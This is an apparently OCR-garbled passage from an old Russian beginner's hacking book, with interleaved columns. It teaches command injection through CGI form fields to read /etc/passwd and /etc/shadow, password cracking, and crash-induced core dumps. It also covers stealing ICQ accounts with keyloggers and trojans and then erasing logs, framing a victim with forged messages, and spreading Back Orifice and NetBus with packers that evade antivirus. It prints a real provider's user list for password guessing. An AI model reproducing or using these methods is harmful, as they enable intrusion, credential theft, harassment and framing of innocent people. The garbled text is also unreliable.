#telnet HOST_IP Вы вероятно задавали себе вопрос — Обязательно после выполнения как работают баннерные системы, каждой команды и перед вводом счетчики страниц, чаты, доски следующей — записываем версию, объявлений, различные формы и т.д.

название и релиз демона на порте.

Безусловно, все они используют CGI… Теперь — остается самое простое — Вот простой пример использования найти exploit к этому демону… CGI, написанного на Perl:

Не работает?

#!/usr/bin/perl print "Content type: text/html\n\n";

Вот возможные ошибки:

print "Hello!\n";

1. Вы ошиблись в версии;

Эта простейшая из всех простейших программ выведет (при ее запуске на 2. Вы ошиблись с IP адресом;

сервере) в вашем браузере строчку:

3. Хост, который вы атакуете, уже Hello!

пропатчен;

и перевод каретки.

4. Вы неправильно используете А вот, простой пример текстового exploit.

счетчика (можете поставить его к себе на Более простые методы взлома страничку). Условия, чтобы он работал:

Вот простой метод взлома (очень 1. Файлы популярный среди новичков) — это взлом Count.cgi — имя файла с через CGI. Что такое CGI? Это Common программой;

Gateway Interface.

45 Хакинг с самого начала Хакинг с самого начала Count.dat — имя файла с Файл count.dat должен содержать данными о посещениях. всего одну строчку с количеством посещений (например 5).

2. Права доступа: (предполагается, что вы находитесь в директории с этими Вот и все! Теперь каждый раз, после файлами): обращения к count.cgi количество посещений будет расти на 1.

Count.cgi 755. Т.е.

Теперь вы знаете некоторые основы #chmod count.cgi CGI и готовы ко взлому через него… Count.cgi 777. Т.е.

Не пытайтесь взламывать #chmod count.dat поисковики и подобные им системы (с Если у вас нет telnet доступа к хорошей посещаемостью) т.к. все они серверу, а только ftp доступ, то найдите очень хорошо пишут CGI скрипты!

программу ftp, которая поддерживает Попробуйте найти какой нибудь функцию chmod или используйте ламерский сайт (желательно зарубежный, текстовую версию программы ftp.

т.к. их больше и по количеству, и по Теперь содержимое программы ламерам в виде администраторов), так как count.cgi:

есть одно правило: «Сложность взлома прямо пропорциональна посещаемости #!/usr/bin/perl сайта».

print "Content type: text/html\n\n";

open (file,"count.dat);

А теперь ко взлому… (Этот метод @dat=;

работает не на всех системах, но в close (file);

некоторых все же пашет…) Скрипт рассылки (записывает ваш e $dat[0]++;

mail и высылает вам что то). Вместо e mail open (file,">count.dat");

пишем просто:

print "$dat[0]\n";

close (file);

cat /etc/passwd print "Всего посетителей $dat[0]\n";

47 Хакинг с самого начала Хакинг с самого начала или мусора, можно вытянуть много полезной информации, например, — те же пороли cat /etc/master.passwd для входа в систему.

или Сброс на винт делается специально cat /etc/shadow для разработчиков данного демона, чтобы Попробуйте все три строки (по они (разработчики) могли просмотреть, очереди). Если пишется ошибка, то как он (демон) навернулся.

возможно, так их не суждено взломать.

Где этот Файл? Файл всегда А если пишется что то типа:

находится в каталоге с демоном и Root:fdkjhgSFDgf:……… называется (обычно) «.core».

То вы набрели на файл паролей… Как «оборвать» демон? Есть Теперь вам необходимо его расшифровать множество различных путей, например, (например john the ripper’ом) и вы явным послать недопустимый набор символов на образом можете проникнуть в систему.

порт этого демона, что может привести к Вывод: скрипты иногда позволяют тому, что он «грохнется».

запускать на удаленной машине программы. Многие наверно помнят пол кбайта, которые вешали любой real networks сервер (сервера для Технология обрыва стэка проигрывания real audio/real video форматов). Кстати, это было не так Обрыв стека — это когда вы вешаете давно… какой нибудь демон, посылая недопустимый набор символов на его порт.

Охота за UIN’ом: Bugs, Crack и Что при этом происходит? При Social Ingineering аварийном выходе демона, он (демон) Итак я вышел на тропу войны: хочу сбрасывает память (ОЗУ) на винчестер.

быть смелым и красивым, с шестизначным При этом из этого сброса, помимо всякого 49 Хакинг с самого начала Хакинг с самого начала UIN номером и чтоб все поняли что секьюрити у пользователя тем быстрее миллионные числа это не серьезно, вот получается полный доступ к его пассворду.

посмотрите на меня — я был одним из Иными словами, чем выше уровень первых пользователей или неважно кем я защиты — тем больше вероятность, что был, важнее кем я стал. А как я стал, жертва введет пассворд для того чтоб сейчас расскажу. использовать ICQ. Ставится троян для облегчения дальнейшего доступа и На мой взгляд самый реальный и перезагружается машина (перезагрузка предельно простой способ: исследование машины зависит от многочисленных Internet Сервис Провайдера и соседских факторов, от операционной системы до сетей на предмет тех пользователей, кто скорости подсоединения к сети). При имеет открытые зашаренные диски и не благоприятном стечении обстоятельств защитили их пассвордом. Находятся такие получение пассворда к выбранному UINу люди программой «Легион». Из пяти сотен займет десять, от силы двадцать, минут — проверенных компьютеров более тридцати ровно столько, сколько потребуется на имело открытым диск C:\ с полным reboot, дозвонку на провайдера, запуск доступом. Все они являлись ICQ и введение пассворда, далее берется пользователями ICQ. Выбор UINов просто лог созданный keyboard sniffer и читается потрясающий — от 20xxxx до 80xxxxx.

пассворд. Все.

Смотрим C:\Program Files\ICQ\UIN и видим number.uin — внутри этого файла Более того, возможность того что всего лишь несколько строк с после всего этого останутся какие либо информацией о номере, имени, нике и e логи или иные следы взлома ничтожно mail адресе хозяина. Если номер мала: уничтожается лог, sniffer и троян.

устраивает, ставится keyboard sniffer Вы что, уже уходите? А что, у который запишет в лог все то, что пользователь введет в клавиатуры.

вас еще что то осталось?

Начнем с того, что если вы ICQ имеет три уровня секьюрити — зарегистрировали аккаунт и забыли к нему Low, Medium и High. Чем выше уровень пассворд, достаточно заявить свой UIN на 51 Хакинг с самого начала Хакинг с самого начала http://www.icq.com/ Рассмотрим конкретный вариант:

password/ и в течении нескольких дней некто Вася Табуреткин зарегистрировал служба технической поддержки ICQ себе ICQ аккаунт под номером 777777.

вышлет на указанный вами при Какой замечательный UIN! Смотрим регистрации e mail адрес забытый какой у Васи e mail, видим пассворд. vasya@something.com. По номеру UINа можно сделать вывод, что он был Теперь рассмотрим это с позиции зарегистрирован более 2 лет назад. Если хакера — для того чтобы получить sometihg.com является публичным пассворд к определенному UINу надо бесплатным e mail сервисом, вполне лишь заявить о потери памяти и пойти может обнаружиться что Вася этот аккаунт проверить e mail.

не пользовал и более такого адреса не Как прочитать сообщение существует. Как результат происходит адресованное не вам — это другая регистрация точно такого же аккаунта, история. Например, существует POP заявляется о потери пассворда и Password Crack — имя логина и домейн проверятся новый e mail на предмет нам уже известны. Главное — это пассворда от 777777.

предельно правильно идентифицировать Существует другой, более сложный систему и тип сервера, аккаунт на котором вариант игры: лишение Васи обладания необходимо проверить и искать его e mail адресом.

инструменты взлома этой конкретной конфигурации. Например, недавно Есть конкретные правила поведения разразился громкий скандал по поводу пользователей сервиса (например: email — hotmail.com в связи с очередной нельзя спамить, web — нельзя недоработкой славной фирмы Микрософт, порнографии), нарушая которые дающей возможность миллионам людей пользователи как правило лишаются права право читать e mail друг друга, чего они на адрес или web страницу. Кто мешает совершенно делать не должны. хакеру написать несколько десятков тысяч воззваний о легализации детской 53 Хакинг с самого начала Хакинг с самого начала порнографии и проституции от имени как о большом достижении в борьбе с vasya@something.com? Установите тип спамерами и рассадниками порнографии.

сервера, узнайте язык общения с ним Вы в тот же день зарегистрируете аккаунт клиента и пошлите все эти воззвания на себя и заявите о потере пассворда. В самому себе и своим друзьям (или на свои итоге у вас долгожданный UIN и твердая другие e mail аккаунты) указав обратным уверенность в том, что если вы имеете адресом vasya@something.com. Далее вы и бесплатный e mail — никто никогда у вас ваши друзья должны будете переправить его не отнимет.

все «полученное» от Васи по адресу Попытка — не пытка, как администратора домена с нотой протеста против легализации и просьбой наказать говорил товарищ Берия виновного. «Послания» Васи следует Поиграем с тем, что ICQ имеет уничтожить и в завязавшейся переписке с лимит на длину пассворда 8 знаков. В администрацией сообщить, что следов Windows среде поменять пассворд на свой преступления осталось мало: вы все стерли UIN нельзя или достаточно сложно — для так как были шокированы и праведный этого существует функция в клиенте. В гнев обуял вас так сильно, что всем Linux, например, в большинстве случаев подъездом вас держали. Попросите имеется файл, в котором существует графа администратора обязательно держать вас в password, куда пользователь вписывает курсе дела. Далее пошлите сообщение того свой пассворд (при возможности хака же самого содержания, используя Васин юниксовой машины пассворд читается без обратный адрес, вашим другим друзьям малейших затруднений, но как получить или на ваши другие аккаунты и напишите доступ к домашней директории администрации о этом безобразии в других пользователя или доступ root — это уже словах. Создайте видимость, что этот Вася совершенно другой разговор).

шлет тысячами сообщения о нелегальных Теперь давайте попробуем прописать вещах группе незнакомых между собой в Linux ICQ клиент конфигурационный людей… Прогнозирую до 80% успеха, у файл, тот самый желаемый вам UIN и Васи отнимут аккаунт, о чем вам заявят 55 Хакинг с самого начала Хакинг с самого начала пассворд из любого набора букв длинной в Кстати, использование сниффера 9, а может и больше знаков. Попробовали? вообще всегда является хорошей идеей сбора информации.

При благоприятном стечении обстоятельств вы сможете получать и Вопрос: меня зовут Петя Иванов, у отправлять сообщения от лица выбранного меня в офисе на одной со мной сетке вами UINa. Если ваш Linux ICQ клиент сидит Маша Пилюлькина и она страшная поддерживает любую длину пассворда и стерва. Что я могу сделать с ней и ее ICQ?

возможность его смены на сервере — вы Ответ: испортить ей жизнь. Если вы берете тот аккаунт, который вам нравится.

находитесь на одном и том же фрагменте Данный баг работал достаточно сети, у вас все карты в руках, «ICQsniff» долго и надеюсь создатели ICQ защитили отдаст вам Машин пассворд, да и впрочем своих клиентов, но кто знает… пассворды всех других пользователей ICQ в вашей конторе. Более того, существуют «Она же… Валентина Понеяд… методы перехвата сообщений от одного пользователя другому и коррекция их, Она же…» например, вы можете следить за Вопрос: Может ли кто либо перепиской Маши и вашего босса. Как изменить пассворд моего ICQ аккаунта без только вам в этой переписке что то не получения доступа на мой компьютер и e понравится, можете сообщить боссу от mail?

лица Маши все, что вы думаете о предмете Ответ: Да, отвечу я и посоветую обсуждения и заявить, что он как искать инструмент взлома ICQ под начальник некомпетентен в этом вопросе, названием «ICQhijeck». При наличии IP а вот, например, Петя Иванов гораздо жертвы, его UINa и номера порта для умнее и так далее, так что давайте Пете связи с клиентом ICQhijeck пошлет Мерседес купим.

spoofed пакет, заявляющий о себе, что Вопрос: а где мне взять ICQhijeck, пакет принадлежит самому клиенту и ICQsniff, keyboard sniffer, трояна и несет в себе задачу смены пассворда.

TCP/UDP sniffer и есть ли что либо еще Пассворд выбирает нападающий.

57 Хакинг с самого начала Хакинг с самого начала такое интересное, где можно нажать Помните, что существует кнопочку и все все хакнуть? вероятность, что кто то может читать ваши сообщения и то, что ICQ не Ответ: Существует такое понятие как является стандартом секретных «Private Bug», нечто обнаруженное лишь коммуникаций.

вами и никому еще не известное. Вполне возможно, что люди, посвятившие много Имеются десятки программ, время изучению методам работы ICQ, способных вызвать сбой в работе вашего имеют очень мощные инструменты по ICQ клиента, особенно если он работает в работе с ним. среде Windows. Следите за новостями, публикуемыми на www.icq.com и Но достанутся ли эти tools вам? Все используйте всегда последнюю версию зависит от вас, от вашего терпения, ICQ, даже если старая имеет свои трудолюбия и любознательности. Не достоинства в виде безлимитного размера забудьте прибавить коммуникабельность и посылаемого сообщения. Вполне умение задать интересный вопрос возможно, что вы заплатите слишком знающему предмет обсуждения человеку.

дорогую цену за эту возможность.

Вполне возможно вы все узнаете.

Имейте антивирусные программы и Если у вас нет друзей, способных используйте их. Так же за ними рассказать вам то, что вы хотите знать, необходимо следить — брать новые советую использовать большие поисковые библиотеки для обнаружения вирусов и системы типа www.yahoo.com. Не забудьте троянов с web сайта производителя указать предмет поиска.

программы.

Выйду на улицу, гляну на Не доверяйте безгранично публичным сервисам типа free emeil, free село… webhosting и так далее. Ничего Время рассмотреть методы защиты и удивительного в том, что кто то что вы должны помнить, если дорожите уничтожил все ваши файлы на страничке своим UINом и информацией, или прочел ваш e mail, я не вижу. Вполне передаваемой при помощи ICQ.

59 Хакинг с самого начала Хакинг с самого начала житейское дело, и, пожалуйста, не имейте Взлом компьютера через публичного Internet e mail адресом для контакта технического обслуживания ICQ с вами в случае потери Как вы догадываетесь процесс пассворда.

взламывания по сети удаленных компьютеров довольно долгое и Будьте готовы к тому, что в один утомительное занятие…Но результат ваших прекрасный день вы обнаружите, что ваш действий может быть очень приятным для пассворд изменен и аккаунт вам не вас.

принадлежит. Обратитесь за помощью в технический суппорт.

Если вы думаете, что я вам здесь буду рассказывать о детских шалостях типа Ну и конечно следите за своим Nuke или атаки на порт 139, то вы сразу компьютером при использовании Internet можете пойти посмотреть сервер — есть большой выбор программ, http://www.microsoft.com — там вам показывающих вам кто, зачем, почему и веселей будет.

когда пытался проникнуть на ваш компьютер.

Если вы хотите чтобы ваше пребывание на любых серверах в Internet Иногда я сам лично думаю, что было менее заметным, а в некоторых вполне возможно что создатели ICQ в случаях практически невидимым, то всегда данный момент насчитывают несколько пользуйтесь Proxy сервером, например, миллионов компьютеров в своей базе через прокси сервер http://www.gin.ru. Это данных, к которым они имеют полный первый момент… доступ. Кто знает, может быть ICQ — это хорошо распространенный троян?

Второй момент — установите себе Сложное чувство, признаюсь вам… программу:

http://www.teamcti.com/pview/PrcView.zip, при помощи которой вы сможете легко обнаружить, какие страшные программы запущены на вашем компьютере… 61 Хакинг с самого начала Хакинг с самого начала Момент номер три: периодически управления) или доступ ко всем ресурсам заглядывайте в раздел RUN системного компьютера вам нужно знать следующее:

реестра вашего Windows 95/98… Это 1. Вам очень легко стать Хакером можно сделать следующим образом:

если вы знаете какой нибудь запустите программу regedit — эта профессиональный язык программа есть в каждой версии Windows программирования, например, C++, или (For Lamers). Далее заходите в раздел Visual C++, или Delphi, или еще какой HKEY_LOCAL_MACHINE\Software\Micro нибудь, поддерживающий 16 и 32 х soft\Windows\CurrentVersion\Run. Там битные современные приложения смотрите, не грузятся ли вместе с вашим (наиболее часто встречаются в сети виндовсом программы паразиты, которые Windows95/98) могут являться причиной утечки 2. Вы не знаете никакого языка, но информации через Internet или локальную вы очень хотите стать Хакером. Самый сеть! Если вы плохо понимаете, о чем я многочисленный вид людей, населяющих говорю — то читайте следующие пункты и сеть. Итак, приступим ко взлому, господа.

вам все станет ясно!

Порядок действий для Виды взломов группы Существует куча просто различных разновидностей взломов, начиная от Вы знаете язык!!! Это круто!!! Вы примитивного локального sharin’га и хорошо его знаете? Если плохо, то идите кончая взломом серверов со сложной ssl учите, или читайте порядок действий защитой, взломов cgi скриптов… Я же группы, или идите смотрите буду рассказывать о наиболее http://www.microsoft.com.

распространенном виде взлома — это Если хорошо — то:

программный взлом, что это такое — вы сейчас узнаете. 1. Вам необходимо написать 16 битное приложеньице типа:

Для взлома чужого (удаленного) компьютера (получение полного 63 Хакинг с самого начала Хакинг с самого начала Client < > Server 2. Все протестировано и готово к работе. Как впарить «Сервер» UL’у? Да Причем придется писать две проще пареной репы… Например, программы (читай дальше).

приклеить это к Особенности серверской части какой нибудь нужной программке и программы:

послать ее (например, на сервер с программами общего пользования) для Сервер должен грузиться склейки программ (причем запускается вместе с виндовсом первой ваша, а потом приклеенная).

Должен быть невидим при Используйте специального клиента, о нажатии Ctrl+Alt+Del котором я расскажу позже. Или пошлите Невидим вообще на экране «другу» новый чат.

виндовса Порядок действий 2 группы:

Выполнять следующие 1. Да… Дело худо… Но не все действия: передавать невидимо потеряно…Ура, радуйся! Существует куча на Клиента (по запросу уже сделанных программ типа клиентской части, проще всего Client < > Server это сделать, используя в которыми сеть запруднена до предела.

программе собственные Единственное, что нужно, так это команды типа разобраться в работе программы, что GetFolderTreeDrive или поверьте мне легче изучения языка. Итак, GetScreenShot — если вы наиболее распространенная программа — грамотный программер — то это BO или Back Orifice, что в дословном вы меня поймете) и так далее переводе обозначает: Администрирование и сколько вам нужно и чего Через Задний Проход. Или программа нужно получить от удаленного NetBus или NetBus Pro, которую можно компьютера, столько и найти практически в любом поисковом делайте.

сервере. Короче, таких программ море… 65 Хакинг с самого начала Хакинг с самого начала Ищите и найдете. Единственным минусом машине, которую нужно взломать. После этих программ является одно — они очень запуска программа автоматически быстро попадают в определение прописывается в автозагрузку Windows и Антивирусов и лечатся антивирусами. Но «не видна» без вооруженного глаза. Но и это — не проблема. Потому как стоит просмотреть список текущих существует куча программ, которые процессов (например, с помощью специальным образом программы PrcView) и мы сразу увидим сжимают — кодируют текст программы и непонятный файл типа.exe. Это и есть антивирус уже бессилен!!! Для примера «сервер» Bo. Так же он создает библиотеку можно привести программу NeoLite, в Windows\system\windll.dll, при удалении расположенную по адресу: которой компьютер можно считать http://www.neoworx.com. Подробно об этих очищенным от Bo.

программах вы узнаете прочитав все до BoGui.exe конца.

Этот файл является «клиентом» и 2. Все, у вас есть одна из таких находится у Хакера. При помощи этой программ, вы сами разобрались, как она программы можно управлять удаленным работает!!! Это тоже подвиг! Теперь компьютером.

читайте пункт 2 для группы людей №1!

BoConfig.exe Описание программы Back Является файлом, при помощи Orifice которого файл BoServ.exe можно склеить с любой программой. Плюс ко всему можно Пакет программы BO состоит из установить порт сервера, пароль сервера, файлов и больше. Мы не будем название и т.д.

рассматривать плугины, а рассмотрим основные 4 компонента.Итак:

BoClient.exe Это приложение является такой же BoServ.exe частью, как и BoGui.exe, но без Этот файл является «сервером». Он как раз и отсылается в чистом виде к 67 Хакинг с самого начала Хакинг с самого начала File find аппликации и управление сервером происходит в командном режиме… Найти файл Target host:port File view Имя хоста, на котором запущен Показать файл сервер BO. Порт, по умолчанию, 31337.

HTTP enable Команды управления:

Включить HTTP сервер на определенный порт Directory creat Создание директорий (каталогов).

HTTP disable Выключить HTTP сервер на Directory list определенный порт Просмотр директорий Key log begin Directory remove Включить запись нажатия на Удаление директорий клавиши Export add Key log end Добавление sharing Выключить запись нажатия на Export delete клавиши Удаление sharing MM capture avi Export list Записать видео.avi файл Список всех sharing MM capture frame File copy Скопировать frame Копировать файл MM capture screen File delete Снять Screen Shot c экрана монитора Удалить файл 69 Хакинг с самого начала Хакинг с самого начала MM list capture device Команды Reg Список доступных видео ресурсов Группа команд позволяющих полностью управлять реестром MM play sound Windows System dialog box Проиграть музыку Вывести всплывающее окно Net connections System info Сетевые подключения Информация о системе Net delete System lockup Удаление подключений Вырубить компьютер из сети Net use System passwords Использования подключений Вывести все пассворды и логины Net view System reboot Просмотр подключений Перезагрузить компьютер.

Ping host Это список наиболее Есть ли сервер Bo на этом хосте распространенных команд!

Process kill Описание программы NetBus Убить какую нибудь запущенную программу Пакет программы Net Bus состоит из 2 файлов.

Process list Список запущенных программ patch.exe Сервер. Сервер довольно удобный, Process spawn т.е. запустил и никаких настроек, все Запустить программу выполняет клиент.

71 Хакинг с самого начала Хакинг с самого начала Netbus.exe Screendump Клиент. Снять Screen Shot с экрана монитора Описание команд Net Bus:

Get info Информация о компьютере Host name/IP Хост на котором запущен сервер Play sound Проиграть музыку Port Порт сервера, по умолчанию Exit Windows Различные способы перезагрузки Serevr admin компьютера Различные настройки управления удаленным компьютером. Пассворд, порт Send text и т.д.

Послать текст Open CD ROM Active winds Открыть CD ROM Запущенные программы и действия с ними Show image Показать картинку Mouse pos Координаты мышки Swap mouse Поменять кнопки мыши Listen Просмотр нажатия на клавиши On Start program Line, всякие комбинации типа Ctrl+Esc, Запустить программу Alt+ Tab и т.д.

Msg manager Sound system Куча действий с сообщениями Управление Саунд системой 73 Хакинг с самого начала Хакинг с самого начала Server setup Защита от Back Orifice Управление самим сервером Программа Back Orifice Eliminator patch.exe позволяет узнать, запущен ли у вас на компьютере сервер BO!!! А так же она Control mouse позволяет показать Управлять мышкой IP адреса тех, кто заслал вам BO Server, проследить за ними и… Go to URL Послать на URL Защита от Net Bus Key manager Программа Net Buster позволяет Действия с клавиатурой узнать, запущен ли у вас на компьютере сервер Net Bus!!! А так же она позволяет File manager показать IP адреса тех, кто заслал вам Действия с файлами (очень развитая patch.exe (который, кстати, можно система) переименовать в любое название), проследить за ними и… И даже в ответную Если сравнивать эти две программы, им то Net Bus является более простой и что нибудь сотворить с компьютером или рассчитана на Users & Lamers. Просто на худой конец форматнуть им диск c:\.

запустить patch.exe и управлять удаленным Хотя есть 1000 способов отомстить и компьютером. А Back Orifice требует покруче.

настроек и более многофункциональна.

Логичней использовать эти программы Как узнать IP по ICQ?

вместе. А лучше учить язык и писать свои.

В Internet таких программ просто море… Элементарно… Воспользуйтесь Так что проверяйте свой компьютер после программой icqs.exe. Она обычно бывает в каждой запущенной программы… виде icqs.rar.

75 Хакинг с самого начала Хакинг с самого начала Как выследить и наказать Далее вы просто звоните этому провайдеру и в наглую стучите на этого Хакера физически?

человека, говорите его IP, в какое время Если тот человек, которого вы он безобразил, что делал и т.д. Провайдер хотели наказать программно, оказался обязан (учитывая УК РФ по статье продвинутым Хакером, не поддается ни на «Информационная безопасность») какие уловки с вашей стороны, ничего не проследить за этим человеком и если запускает, все проверяет, анализирует и, действительно его действия будут наконец, просто предельно осторожен и признаны как неправомерные — то он бдителен — то остается одно средство — лишится в лучшем случае провайдера наказать его физически, разумеется, не (возможно даже с оповещением других зная его адреса — это невозможно, но есть провайдеров), а в худшем — вообще один способ.

Internet на всю жизнь и мало того, можно Вам необходимо узнать его IP адрес подать на этого человека в суд. Ну это все в Internet — это легче пареной репы. К лирика и действовать нужно так только в примеру, вы знаете его уникальный самых крайних случаях. А настоящий псевдоним или ник, вы ищете все по Хакер очень круто шифруется, использует этому нику на http://www.yandex.ru, т.е.

краденый Internet и нет никакой всю возможную информацию про него, уверенности, что вы выйдете именно на места, где он что либо делал или того человека, на которого хотите… подписывался своим e mail или ником (это могут быть различные Guest Book`s, Уроки сетевого хакинга для чаты, которые записывают IP посетителей). После того, как вы узнаете начинающих его IP, вам необходимо узнать, кто его Сетевые хаки это круто и просто.

провайдер, телефон, адрес, страну, все это Однако, как именно, и что именно нужно можно сделать при помощи строчки, в делать знают еще далеко не все. В народе которой вы введете его очень IP адрес, и вы получите все… 77 Хакинг с самого начала Хакинг с самого начала популярны exploit, то есть, готовые Как утащить etc/passwd инструментарии для взлома, написанные В конференциях RU.HACKER и другими хакерами.

RU.NETHACK периодически вспыхивают дискуссии: как утащить из под лап Но, во первых, это не интересно и администратора знаменитый файл ставит в зависимость от тех, других etc/passwd? А после того, как утащили — хакеров (дадут ли они нам или опять что с ним можно делать?

зажмут все самое ценное?), а во вторых, они очень быстро перестают работать — Сказывают, что якобы там хранится дырки то затыкаются, а свежих exploit раз несметное количество паролей, логинов, два и обчелся, да и те устаревают не по аккаунтов, словом всего, что только дням, а по часам. Пусть среди админов пасется на этом сервере. Другие же много лохов, но и они начинают чесаться, утверждают, что нет там ничего, а если что когда их взломают раз — другой кряду.

и есть, так оно зашифровано и никакой жизни не хватит, чтобы вернуть его в Поэтому единственная возможность читабельное состояние.

учится ломать самим. Самим искать дыры и писать простейший инструментарий для Кто же из них прав? Тем более, что взлома. Однако, как бы это ни было некоторые уже не раз оглашали мир просто, но все же требует определенной радостным мявом, что, дескать, пароли усидчивости и умственных усилий.

они утащили и сейчас будут сидеть их расшифровывать. Конечно же, ни с кем Зато потом можно не просто считать другим они делиться своим богатством не себя хакером, но и быть им! Стоит ли собираются! Ну и не надо! Мы и сами с одно другого? Несомненно! Тогда — в усами! Вот как пойдем по ссылке путь. Путь долгий и тернистый. Ведь в http://kpnc.webprovider.com/hack.pl, да и двух словах, как это ломают, не посмотрим etc/passwd одного далекого расскажешь. Так что запасайтесь пивом и заокеанского провайдера, да еще в быстренько подключайтесь к Internet читабельном виде.

(начальный доступ у вас все же должен быть). Сейчас начнется самое интересное!

79 Хакинг с самого начала Хакинг с самого начала demo Demo User Вот, что мы увидим на экране! (Тут /usr/demo надобно заметить, что если стоит Netscape, mail Sendmail то ничегошеньки видно не будет;

а если /var/spool/mail мы установили IE 4.0 (5.0) и все равно brian Brian Atkins,,, ничего не видно, — так это просто надо /export/home/brian подождать, — файл etc/passwd очень kannada Narendra Tumkur длинный, и если канал у вас не шибко /disk1/k/kannada быстрый, то перекачка может занять, pumpkin2 liao xin возможно, очень долгое время, — ждите /disk1/p/pumpkin тогда).

lost508 no idea Наконец на экране появится /disk1/l/lost следующее:

essepi Salvatore Calarco /disk1/e/essepi DISPLAY ETC/PASSWORD FILE… rajatbhasin Rajat Bhasin LOGIN NAME DIR /disk1/r/rajatbhasin root System Administrator /root panze Congo Koa toor System Administrator /root /disk1/p/panze daemon System Daemon / goni1 Naseer Bhatti sys Operating System /tmp /disk1/g/goni bin BSDI Software madmama patty noland /usr/bsdi /disk1/m/madmama operator System Operator yccwp yang changchun /usr/opr /disk1/y/yccwp uucp UNIX to UNIX Copy Это только малая часть от всей /var/spool/uucppublic таблицы. Правда, паролей там нет. То есть games Games Pseudo user они не показаны в явном виде — /usr/games законодательство надо же соблюдать хотя news USENET News,,, бы формально.

/var/news/etc 81 Хакинг с самого начала Хакинг с самого начала Как их получить, об этом будет потом вы станете настоящим хакером рассказано ниже. (шутка, однако)!

А пока можно, изучив список Итак, начнем разбираться, с логинов юзеров, попробовать угадать, кто премудростями автора. Для начала же из них окажется таким лохом, что заглянем внутрь файла nethackk1.htm (для выберет короткий пароль, или, что еще этого в меню «Вид» браузера выберем лучше, пароль совпадающий с логином. «Просмотр в виде HTML») — нам Уверяю вас, таких лохов значительно представится следующие:

больше одного, так что на всех хватит, не говоря уже о такой халяве как:

LOGIN NAME DIR demo Demo User /usr/demo На этом наш первый маленький взлом можно считать завершенным.

Теперь разберемся, что же в действительности произошло и можно ли так ломать других провайдеров или нет?

Что это было?

Так что же произошло на самом деле? Хитрый автор только дал кликнуть по ссылке, а все остальное сделал сам. Это конечно хорошо, но будет лучше, если не только дать рыбу, но еще и научить ее ловить!

Ты хочешь посмотреть etc/pasw одного провайдера?
Рыбу ловить изволите? В самом деле? Тогда приготовьтесь, что это будет долгий и муторный процесс, но зато 83 Хакинг с самого начала Хакинг с самого начала Тогда ЖМИ [DIR] Parent Directory 09 Oct 11:10 Не нужно быть посвященным в [DIR] _private/ 09 Oct 1999 11: тонкости программирования HTML, что бы понять, что выделенная [TXT] form.html 09 Oct 1999 12:26 1k подчеркиванием строка — перенаправила нас на другой сервер и попыталась [DIR] images/ 09 Oct 1999 11:30 открыть, хм, какой то «hack.pl».

[TXT] irc.html 09 Oct 1999 12:21 0k Странно? А почему не html? Ну что же, попробуем открыть hack.pl [TXT] mamairc.html 09 Oct 1999 12: самостоятельно. Наберем эту строчку в 4k окне браузера, — как вновь выскочит [TXT] postinfo.html 09 Oct 1999 11: табличка с паролями. Быть может это 2k hack.pl и есть? И автор нас просто [TXT] thank_you.html 09 Oct разыграл, — смастерил фэйк, то есть 12:26 1k составил эту таблицу от балды?

Эге! Да тут директория _private. А Но нетрудно убедиться, что таблица ну, пустят нас в нее или нет? Кликнем эта живет своей «жизнью» — уходят одни мышом и с замиранием сердца ждем. Вот пользователи — добавляются новые и черт, не пускают!

самое главное, что все логины А узнать, что там, ой как хочется! Ну правильные! Возьмем один, выбранный что же, попробуем атаковать «в лоб».

наугад. Вот, например, madmama. Что Вводим пароль «madmama» и с скрывается за ним?

нетерпением ждем… Держите нас, это Набираем в строке браузера сработало!!!

«madmama.webprovider.com» и что мы Ну и что же в приватах? Гм, одна видим?

большая dbf с названием prices. А, прайс Index of / 85 Хакинг с самого начала Хакинг с самого начала — по русcки. Словом, ничего интересного. смогли узнать и о сервисах самого Но вот сам факт взлома! А юзеров то на провайдера, о которых он почему то сервере сотни, поэтому это увлекательное публично умалчивает. Например, мы ясно путешествие можно только продолжать и видим, что сервер новостей установлен:

продолжать!

news USENET News,,, /var/news/etc Ладно, все это очень интересно, но Но если просканировать порты как же автор утянул сей ценный стуфф? И сервера (любой программой, например, не боится ли он, что к в какой то момент NetInfo), то наc грязно обломают и его прикроют? Разумеется, нет, и я готов скажут, что никаких тут ньюсов нет.

поделиться с вами своим ББС (большим Ну, как дорваться до ньюсов, это буржуинским секретом). Ведь никакого тема отдельного разговора, а вот взлома автор не совершал. Файл простенький сендмайл можно Etc/password доступен с теми правами, использовать и так. Порты открытые — которые ему (да и любому другому как на POP3 (то есть чтение почты), так пользователю) выделил администратор. И на SMTP (то есть ее отправку).

нечего огород городить! Etc/password — это Впрочем, и почту и ньюсы ломать не общедоступный ресурс — во всяком случае интересно — другое дело еще раз на чтение и всякий может его поглядеть — взглянуть на etc/password! Только как?

было бы желание! А Попробует подрубаться по ftp (ну, а как же иначе то).

администратор вовсе не лох — ведь паролей в etc/password нет, как мы в этом Набираем в браузере в последствии убедимся.

«ftp://ftp.werbprovider.com» — так нас грязно пошлют подальше. Да и если бы не Однако, как мы выяснили, что послали, — все равно бы мы ничего не пароли для взлома не всегда обязательны, смогли увидеть.

— достаточно вполне знать логины и проявить малость интуиции и Ведь все директории, которые видны находчивости. К тому же мы многое по WWW или FTP — это виртуальные 87 Хакинг с самого начала Хакинг с самого начала директории, которые ничего не имеют В работе с UNIX нет ничего общего с физически расположенными на мистического и освоить простейшие диске. И оттуда etc/password действительно операции можно в течение буквального никогда (ну разве что очень очень редко) одного вечера, особенно если не бывает виден. воспользоваться толковой книжкой. К счастью, недостатка в литературе Как же автор получил его? Очень испытывать не приходится, но слишком просто — исполнил на удаленной машине много — так же плохо, как и совсем скрипт… ничего. Попробуй, выбери одну книжку из десятка, разбросанных по витрине!

Первые шаги с UNIX Поэтому, пришлось посвятить один урок Умение обращаться с UNIX основам UNIX, что бы помочь необходимо каждому уважающему себя начинающим сделать первый шаг в ее хакеру, поскольку подавляющее мир. На звание учебника эта глава не большинство серверов работает именно претендует, но, по крайней мере, поясняет под управлением UNIX, и прежде чем основные команды UNIX, используемые в объяснять, как их ломать, нетрудно бы для обиходе.

начала разобраться, как это хозяйство Для UNIX существует множество работает.

интерактивных оболочек с развитым Для этого вовсе не обязательно пользовательским интерфейсом — от устанавливать Red Hat или Black Cat на Mortal Commander (аналог Norton свой компьютер, — достаточно Commander) до графических сред а ля воспользоваться одним из эмуляторов Windows. Они помогают начинающим UNIX или получить аккаунт на сервере освоиться в мире UNIX, но оказываются hobbiton.org (для этого необходимо нажать крайне неудобными для удаленного клавишу «Пуск», набрать «telnet управления компьютером. Даже текстовой hobbiton.org» и в качестве имени Mortal Commander ощутимо тормозит на пользователя ввести 'newuser').

